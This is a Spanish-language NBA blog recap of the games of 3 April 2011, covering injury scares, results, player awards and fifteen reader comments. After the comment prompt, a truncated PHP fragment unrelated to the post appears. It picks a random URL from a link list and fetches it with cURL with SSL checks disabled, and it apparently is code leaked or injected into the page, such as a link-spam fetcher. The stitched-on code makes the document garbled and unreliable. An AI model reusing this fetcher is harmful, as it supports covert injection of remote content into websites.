La Crónica (03/04/2011)

04 de April de 2011 por TheDeerHunter

Noche de infarto para algunos y no precisamente por la emoción del resultado. Varios conatos de lesiones muy significativas.

Los Lakers sufrieron uno por partida doble. Sendos sustos por Pau y Bynum, ambos en rodilla. Parecía más grave el del español cuando Nené le negó un mate con falta y él cayó al suelo doblando muy mal la pierna. Se retiró unos minutos al vestuario y volvió pero se le observó alguna dificultad en el desplazamiento lateral. Antes de su vuelta, Bynum había mostrado uno de sus típicos malos gestos con su rodilla y terminó el partido en el banco. Aunque Odom estuvo francamente bien, la defensa notó ambas incidencias. Kobe combinó acciones increíbles con errores de lectura evidentes y los Nuggets impusieron su constancia (95-90).

Los Mavs también andan con quebraderos de cabeza con Tyson Chandler. Anoche no fue de la partida en Portland lo que, unido a una actuación espeluznante de Kidd, les costó la derrota y la posibilidad de recortar distancia con L.A. (96-104).

Otros que se llevaron un susto morrocotudo fueron los Hornets con Chris Paul. Tras perder a West, anoche temieron perder a su base estelar para el resto de campeonato con una lesión en la misma rodilla que le causó tantos problemas el año pasado. Volvió, ganaron a Indiana y la angustia cesó bastante cuando le vieron cerrar la cuestión con 18 puntos y 8 asistencias (96-108).

El que se retiró para no volver fue Shaq en la victoria de los Celtics ante Detroit (90-101). El día de su vuelta, se pega dos carreras y a la segunda sale lesionado con un problema distinto al que le ha dejado fuera estas últimas semanas. Se comenta que es poca cosa, pero nadie puede asegurar si disputará algún partido lo que queda de regular o lo reservarán directamente para Playoffs. No puede ignorarse la duda que hay latente sobre lo que podrá aportar al equipo en los cruces.

Por si todo esto no fuera poco los Suns también perdieron a Nash por fiebre, y los Spurs lo aprovecharon para romper su mala racha (97-114). Hill, Bonner y Gary Neal fueron el “big three” de Popovic anoche.

Dejando de lado estos temas escabrosos, lo más destacado de la jornada fue la victoria de Houston ante Atlanta, que les permite todavía soñar con cambiar su destino (109-114). Extraordinario duelo Kevin Martin vs Joe Johnson que se llevó el primero. Por su parte, los Raptors dieron la campanada ante Orlando, a los que se le vio bastante el plumero defensivamente. Casi 20 rebotes de ventaja para los canadienses, que deberían ser bochornosos aunque no te juegues nada (98-102). Qué pasote Reggie “Carpanta” Evans.

Terminando, los Heat ganaron fácil a Nets (108-94), Knicks a Cavs (107-123), Sacramento a Utah (97-106) y Wizards a Bobcats (97-91), otra vez con Blatche y Crawford tocando la guitarra.

PREMIOS

MVP: El nivel de los últimos partidos de LeBron James es como para hacer dudar a todos aquellos que ven clarísimo el MVP de Derrick Rose. Anoche se fue a los 31 puntos, 11 rebotes y 7 asistencias. Que no se despiten los Bulls porque si Miami acaba por delante suyo, veremos…

Rookie: 19 puntos, 9 rebotes, 6 asistencias y 5 robos… ¿veremos otro triple doble de un rookie antes de final de temporada? La brillante actuación referida fue de Demarcus Cousins.

Sorpresa: El mejor jugador de los Bobcats fue Matt Carroll, un jugador que ni siquiera habría sido capaz de decir que jugaba este año en la NBA. Anotó 17 de sus 26 puntos en el último cuarto pero no evitó la derrota de su equipo.

Decepción: Jared Jeffries se quedó sin anotar en 26 minutos en los que además aportó tan solo 2 rebotes y un par de tapones. Eso sí, su balance fue de +26. ¿Una prueba de la inutilidad de esta estadística? Otro que se quedó con 0 puntos en su casillero fue Jason Kidd, que falló los 6 tiros que intentó.

Esfuerzo en vano: Cerquita del triple doble se quedó Josh Smith en la derrota de su equipo frente Houston. 21 puntos, 11 rebotes y 7 asistencias para el alero de los Hawks.

Imágenes | AP Photos / Getty Images

Comenta

15 comentarios a esta entrada

  1. Hynreck dice:
    #1

    Creo que Bayless mejora notablemente a Calderón. Aunque venga Mestre a decirme que es una castaña.
    He dicho.

      Citar

  2. TheDeerHunter dice:
    #2

    Conociéndote, desconozco cuánto de tu frase es “vendernos la moto” con Bayless y cuanto es convencimiento. XD

      Citar

  3. MagicJohnson32 dice:
    #3

    Yo en cuanto vi que Calderón se lesionaba pesqué a Bayless en la yahoo, y no veas qué fichajazo, jeje.

      Citar

  4. TheDeerHunter dice:
    #4

    Yo si quieres, Hynreck, te doy a Arenas por Bayless… para que veas que no me cierro en banda.

      Citar

  5. Hynreck dice:
    #5

    Ni dudéis que cualquier afirmación mía tiene intereses ocultos jajaja
    Mis convencimientos variarán en cuanto Bayless ya no sea Playmaker 😛

    Deer, a Arenas no me le cuelas ni hipnotizado.

      Citar

  6. Viva_Dirk dice:
    #6

    Los Nuggets haciendo buenas gestiones este verano deben ser un fijo en las primeras posiciones del Oeste los próximos años, tendrán que buscar salida a Lawson o Felton, seguramente por salario es mas facil que salga Felton, y decidir también entre Gallinari y Chandler, aunque podrian quedarse ambos. Y tienen dinero para ofrecer un contrato muy alto a algun agente libre, de primeras se me ocurre David West.

      Citar

  7. HisRoyalAirness dice:
    #7

    El partido de Lakers lo pierde Kobe en una entrada a canasta forzadísima cuando están 4 abajo con TODOS sus compañeros solos pidiéndole el balón con las manos. Le estaban cubriendo 3 a la vez sabiendo positivamente que no la iba a soltar. Al final un 10 de 27 y derrota, para hacérselo mirar.

    Y hablando de Calderón, en el tiro ha tenido un año bastante asqueroso pero, en semejante equipo de paquetes, está en el top 5 de asistentes de la liga. Y no juega con Garnett, Allen y Pierce precisamente. Al cesar lo que es del cesar

      Citar

  8. Len Bias dice:
    #8

    Vaya futuro tienen los Wizards. Con Wall, que tiene pinta de ser una estrella en unos años, Crawford, Blatche y McGee. Y con bastante espacio salarial en cuanto suelten a Rashard.

      Citar

  9. Denise dice:
    #9

    Len Bias me has copiado mi comentario hecho unos dias atras sobre Wizards.
    Nada es broma, es normal que pienses esto sobre este equipo. Hay mucho talento joven ahí metido más el top 5 que pillarán este año en el Draft.
    Vergurnza, bochorno, descalabro, no sé como explicar la derrota de los Magic ante unos pateticos Raptors que encima jugaban sin Kleiza, Bargnani y Calderón. Cada vez veo mas claro que DH12 acabará como Shaq O´Neal

    Sorry: me equivoqué al rellenar los datos, y hay un comentario mio igual que este en moderación. Eliminad el que está en espera.

      Citar

  10. Sancho88 dice:
    #10

    Además también llegó a una final con los Magic y la perdió. Buena comparación. En Washington a mi me mola mucho Young. Menudos muelles. Y verles jugar tb alegra el día. En ese sentido también molan los Sixers, Indiana… son vistosos (no pongo en esta lista a Sacramento porque me indigna que ahora se hayan enchufado y se pongan a ganar partidos, cuando antes habían tirado la liga por la borda, pero sí, tb me molan en su juego, jje). Y los Raptors tb, jajaaj. Y los Suns. Y con esto no quiero entrar al detalle de si es un juego efectivo, que visto lo visto… excepto Philly los demas no estan en playoffs. pero joder, son equipos que les mola jugar a muchos puntos y mecanizan muy bien los ataques casi siempre en menos de 15 segundos, encontrando posiciones bastante buenas dentro y fuera, aportando espectáculo en alley hoops.. etc. mantienen un poco el pulso de los años 90, donde todos los partidos se iban a mas de 100 puntos por barba. no se, es solo mi opinion eh, que tengo 22 tacos y se que aqui hay muchos de la epoca de pat riley… de cuando jugaba, incluso. jeje.

      Citar

  11. Sancho88 dice:
    #11

    Corrijo, Indiana sí esta en playoffs. menos mal que al final lo han encarrilado. no quiero ni pensar si hubieran remontado Charlotte, Milwaukee, Detroit… menuda bazofia de liga que se han marcado estos equipos

      Citar

  12. Len Bias dice:
    #12

    Denise, he estado desde el jueves desconectado del mundo así que es por esto que no habré visto tu comentario xD
    De acuerdo con Sancho, también me gusta Nick Young aunque es muy chupón, pero para tirarse unas canastas saliendo desde el banquillo es bastante válido.
    Si cogen un buen alero en este draft tendrán un equipazo y muy joven. Inconvenientes por un lado, ventajas por otro.

      Citar

  13. max dice:
    #13

    Pues Nick Young acaba contrato y los Wizards tienen una opción de tanteo, pero con Wall, Jordan Crawford ,R.Lewis(minimamente implicado y sano) y un top5 en el draft que juegue de 2 o de 3, igual no les interesa que siga.

      Citar

  14. inad23 dice:
    #14

    Los Nuggets desde el All-Star esta en la 3a posicion en menos pubtos anotados…O_o solo 96pp o algo asi con un balance de 10-2 creo…es alucinante estan mejor sin billups y melo….
    En mi opinion ahora juegan mucho mas en equipo y todos aportan aunque a mi el jugador que mas me esta gustando es Gallinari…

      Citar

  15. Denise dice:
    #15

    Yo creo que el secreto de los Nuggets es su rotación “europea” en el que no tienen un jugador franquicia claro, pero juegan en equipo, todos aportan y cualquiera de ellos te la lía en un momento dado, en lugar de apostar por dos estrellitas que no son tan estrellas, tres jugadores medianos cumplidores y un banquillo que apesta….

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>